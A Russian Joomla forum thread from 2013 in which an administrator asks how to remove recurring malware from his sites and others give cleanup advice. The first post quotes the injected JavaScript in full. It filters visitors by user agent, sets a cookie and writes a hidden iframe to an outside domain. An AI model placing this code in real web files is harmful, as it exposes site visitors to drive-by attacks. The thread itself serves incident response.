0 Пользователей и 1 Гость просматривают эту тему.
  • 92 Ответов
  • 6373 Просмотров
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Вирус на сайте
« : 14.10.2013, 22:35:43 »
Здравствуйте! У меня снова вирус на сайте. Из-за его я не могу добавить, редактировать, удалять материалы и не работают слайдшоу и другие спецэффекты. Похожий вирус у меня был этим летом. Но возился я с ним долго и уже не помню как его удалил. Сейчас похожий вирус, но долго с ним возиться нету времени. Вот вся суть вируса: он заражает все js файлы этим кодом "
Код
//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://linkchat.ru/gfsarj.fajwrt?default" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817
". Я удаляю его и он появляется снова и так каждый раз. У себя на ноуте нашёл штук 20 вирусов ( в том числе и некоторые php трояны), которые я удалил. Как я понимаю, что код, который я предоставил выше- это результат работы вируса, а не сам вирус. А сам вирус где-то прячется в php файлах. Кто-нибудь может, пожалуйста, подсказать, где мне искать вирус. Может у кого нибудь уже такой вирус был и он готов поделиться опытом? Спасибо большое!
Адрес сайта, если понадобиться могу дать. Так же смогу заплатить, если что.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #1 : 14.10.2013, 22:39:08 »
Я в принципе мог был глянуть. А сколько сайтов на аккаунте?
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #2 : 14.10.2013, 22:45:40 »
В принципе 3 сайта. 2 сайта на Joomla 1.5 и один сайт (нерабочая копия первого сайта) на Joomla 2.5. У всех 3 сайтов js файлы заряжены.
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #3 : 14.10.2013, 22:50:15 »
Варезные расширения тестировались/установлены на сайте?
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #4 : 14.10.2013, 22:50:34 »
Для выявления вредоносных скриптов лучше всего наверно воспользоватся скриптом ai-bolit. Хорошая вещь. Еще можно разными скриптами форумчан. Ссылка в подписи.

Так же смогу заплатить, если что.

Или если решите обратится на платной помощью, то завтра с утра (10 вечера у нас) могу приступать к работе, после того так договоримся.

*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #5 : 14.10.2013, 22:56:01 »
Поскольку сайт уже был взломан, поиск вирусов по факту взлома - это бороться с симптомами, а не с источником, - пустая трата времени и денег.
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #6 : 14.10.2013, 22:57:52 »
То, что закрыть дыры нужно, понятно.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Вирус на сайте
« Ответ #7 : 14.10.2013, 22:59:37 »
Похоже пошли по новому кругу
http://joomlaforum.ru/index.php/topic,198048.0.html
Joomla 1.5.26, редактор JCE не применяется, nnframework применяется?
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #8 : 14.10.2013, 23:05:58 »
ai-bolit пользовался. Но он дал мне очень большой список файлов. Там были указаны все заряжённые JavaScript файлы и куча файлов, которые содержат ошибки. Вот пример одного сайта znb-by.org/ . Как видно, верхнее слайдшоу не работает из-за вируса. Скорее всего вирус попал на сервер через мой ноут. Но теперь я все вирусы на ноуте нашёл и удалил.
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #9 : 14.10.2013, 23:07:07 »
"Закрывать дыры" - это лить воду в песок. Хотя, судя по молчанию пострадавшего в ответ на мой вопрос о наличии вареза на сайте, именно в том самом песке и находится его голова.

@draff,

даже если на сайте(ах) и находятся старые, уязвимые версии JCE и NoNumber Framework, их смена на новые, безопасные, при оставленных варезных расширениях, которые уже вступили в работу и передали сайт в руки злоумышленника(ов) - полная ма*8(*%;ация.  *DRINK* (Кампай)
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #10 : 14.10.2013, 23:13:36 »
Насчёт вареза не знаю. Давно ничего не устанавливал. Шаблон собственной разработки. А вот на ноут много скачиваю и всё подряд. 90 % что вирус пришёл с ноута по сфтп.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #11 : 14.10.2013, 23:13:46 »
Не факт, что через ноутбук. Надо было обработать эти файлы. Оказалось, белорусский язык достаточно понятен не говорящему на нем :)

Я спать. Еще совет. Все сайты под одним пользователем держать нельзя.

То, что давно не устанавливали, плохо. Обновляться надо хотя бы по возможности.
« Последнее редактирование: 14.10.2013, 23:18:00 от wishlight »
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #12 : 14.10.2013, 23:18:02 »
Не факт, что через ноутбук. Надо было обработать эти файлы. Оказалось, белорусский язык достаточно понятен не говорящему на нем :)
Если на счёт сайта, то я просто технический админ. За ошибки в т. ч. и за вирусы отвечаю я, а за контент другие люди.
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #13 : 14.10.2013, 23:18:55 »
Насчёт вареза не знаю. Давно ничего не устанавливал. Шаблон собственной разработки. А вот на ноут много скачиваю и всё подряд. 90 % что вирус пришёл с ноута по сфтп.

Наконец-то начинаем говорить доктору правду: "Да спал подряд с теми, что дают бесплатно, но сами работают без медсправки. Да, с пенетрацией!"
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #14 : 14.10.2013, 23:20:10 »
А у других людей какие аккаунты (уровень доступа) на сайте?
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #15 : 14.10.2013, 23:22:50 »
А у других людей какие аккаунты (уровень доступа) на сайте?
По ftp доступ не имеют. Только через админ. панель.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #16 : 14.10.2013, 23:25:01 »
менеджер/администратор/суперадминистратор?
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #17 : 14.10.2013, 23:29:09 »
Менеджеры и администраторы
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Вирус на сайте
« Ответ #18 : 14.10.2013, 23:32:50 »
Уровень доступа "администратора" не желателен тоже для неопытных пользователей, если такие есть.
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #19 : 14.10.2013, 23:40:07 »
Цитировать
90 % что вирус пришёл с ноута по сфтп.

Чем скорее Вы признаетесь самому себе, что 90% - это фактически 100%, то тем скорее Вы найдете ответ на вопрос действительного восстановления сайта.
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #20 : 14.10.2013, 23:44:57 »
Так как мне его удалить? На ноуте вирусов уже нету.
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #21 : 15.10.2013, 00:18:22 »
Цитировать
На ноуте вирусов уже нету.

На данный момент Ваш ноутбук можно забыть. Он свое черное дело сделал и теперь как таковой не играет никакой роли в восстановлении сайта (в скобках, вне протокола: то, что Вы нашли с помощью какого-либо анти-вирусника какие-то известные вирусы, не говорит о том, что Ваш н/бук чист. Такого не произойдет до тех пор, пока вы не проведете глубокое форматирование его жесткого диска, желательно с заполнением дискового пространства нулями).

Цитировать
Так как мне его удалить?

Если желаете "удалять" "вирусы", то перечитайте мое определение такой псевдо-стратегии в ответе #9.



# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #22 : 15.10.2013, 00:25:27 »
Короче я ничего не понял. Сколько Вам заплатить за очистку от вирусов?
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #23 : 15.10.2013, 00:41:27 »
Пардон, но у Вас обо мне возникли неправильные идеи. Меня не интересуют Ваши деньги. Я, идиот, пытаюсь Вам второй час доказать, что как только на Ваш сервер попал вне Вашего контроля вирус на систему Joomla, бороться с вирусом бесполезно.

Ваше лучшее решение - это уйти на другой хостинг и откатиться на нем на нулевые позиции, т.е. пересобрать сайты с нуля (те, что находятся на J! 1.5.x, по-хорошему нужно мигрировать на J! 2.5.14) на чистом аккаунте. Ваш нынешний хостинговый аккаунт(ы), а возможно, что и соседние с ним(и) аккаунты - захвачены в непредсказуемой степени. Пора признать этот факт и двигаться дальше.
« Последнее редактирование: 15.10.2013, 00:45:02 от AlexSmirnov »
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #24 : 15.10.2013, 00:44:44 »
Может быть. Но это займёт месяца с моим то временем. А решение хотелось бы получить уже сегодня. Мне сначала нужно избавиться от вируса, чтобы люди могли добавлять статьи, а затем можно будет год думать о безопасности.
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #25 : 15.10.2013, 08:27:15 »
Так целый день я же не буду этим заниматься. Сначала мне нужно удалить вирус, а уже потом переносить сайты на новый хостинг. Короче ничего нового я не узнал. Я спрашивал, что может кто- то сталкивался с этим вирусом и знает где его главный файл находится, а Вы мне прочитали общую лекцию по серверной безопасности. Я же не спрашивал, что мне делать, чтобы вирусов больше не было?
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #26 : 15.10.2013, 08:27:50 »
Так целый день я же не буду этим заниматься. Сначала мне нужно удалить вирус, а уже потом переносить сайты на новый хостинг. Короче ничего нового я не узнал. Я спрашивал, что может кто- то сталкивался с этим вирусом и знает где его главный файл находится, а Вы мне прочитали общую лекцию по серверной безопасности. Я же не спрашивал, что мне делать, чтобы вирусов больше не было?
*

ip-94

  • Осваиваюсь на форуме
  • 27
  • 0 / 0
Re: Вирус на сайте
« Ответ #27 : 15.10.2013, 10:47:38 »
Короче я всё понял. Загружу старый архив без вирусов, а бд возьму с текущего сайта.
*

AL_ALEX

  • Глобальный модератор
  • 855
  • 112 / 1
Re: Вирус на сайте
« Ответ #28 : 15.10.2013, 12:14:04 »
ip-94, чтобы сайт начал функционировать либо восстановитесь из бэкапа, если таков есть, либо замените все файлы на новые. Т.е. скачиваете дистрибутив Joomla и заменяете все файлы (кроме папки installation) и так же все сторонние компоненты модули и плагины.
В этом случае сайт будет функционировать, на то время, пока по нему не пройдутся заново. Обычно это сутки.

Ваше лучшее решение - это уйти на другой хостинг и откатиться на нем на нулевые позиции, т.е. пересобрать сайты с нуля (те, что находятся на J! 1.5.x, по-хорошему нужно мигрировать на J! 2.5.14) на чистом аккаунте. Ваш нынешний хостинговый аккаунт(ы), а возможно, что и соседние с ним(и) аккаунты - захвачены в непредсказуемой степени. Пора признать этот факт и двигаться дальше.
Немного перегнули. Не раз уже чистил сайты и они до сих пор функционируют на тех же хостингах и сборках.
А то получается клеймо, если меня сломали, надо все делать заново.
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Вирус на сайте
« Ответ #29 : 15.10.2013, 19:17:44 »
@AL_ALEX,

Цитировать
они до сих пор функционируют на тех же хостингах и сборках

Печально, что Вы не видите, что именно в этом колыбельном функционировании и состоит цель варез-предпринимателей. Их цель - серверы, а не веб сайты. Или Вы думаете они вам на захваченных сайтах на главной странице разместят крупный баннер "Этот сайт контролирует дикхэд Иван Иванов!"?
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

На сайте пропал автоматический ресайз картинок для вывода на главной

Автор mimoza

Ответов: 6
Просмотров: 1828
Последний ответ 30.11.2017, 09:02:25
от SeBun
Неправильное формирование ссылок на сайте

Автор wsergw

Ответов: 1
Просмотров: 1400
Последний ответ 22.08.2017, 11:05:35
от voland
Не отображаются материалы и ссылки на сайте (joomla 1.5)

Автор МарияЛ

Ответов: 1
Просмотров: 1215
Последний ответ 17.03.2017, 20:33:56
от voland
Как найти "заразу" на сайте?

Автор Naslednik

Ответов: 9
Просмотров: 1508
Последний ответ 07.11.2016, 22:19:57
от altvvc
Как найти код редиректа на сайте?

Автор Escander

Ответов: 12
Просмотров: 3202
Последний ответ 21.04.2016, 18:49:29
от draff